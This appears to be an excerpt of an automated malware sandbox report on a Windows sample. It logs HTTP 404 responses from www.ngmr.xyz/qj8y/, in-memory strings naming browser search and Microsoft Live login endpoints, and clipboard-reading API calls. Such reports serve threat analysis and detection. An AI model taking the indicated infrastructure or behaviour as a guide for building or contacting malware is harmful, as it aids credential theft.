            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 17:22:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 05 Dec 2024 17:22:54 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 05 Dec 2024 17:22:57 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 05 Dec 2024 17:22:59 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Thu, 05 Dec 2024 17:23:02 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 17:46:31 GMTX-Varnish: 1252442322Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 17:46:34 GMTX-Varnish: 1252442352Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 17:46:36 GMTX-Varnish: 1252442382Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 17:46:40 GMTX-Varnish: 1252442421Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: WNGaDiurNI.exe, 00000008.00000002.2717205821.0000000001048000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ngmr.xyz
            Source: WNGaDiurNI.exe, 00000008.00000002.2717205821.0000000001048000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ngmr.xyz/qj8y/
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000007.00000003.2149406438.0000000007BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00856B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00856B0C
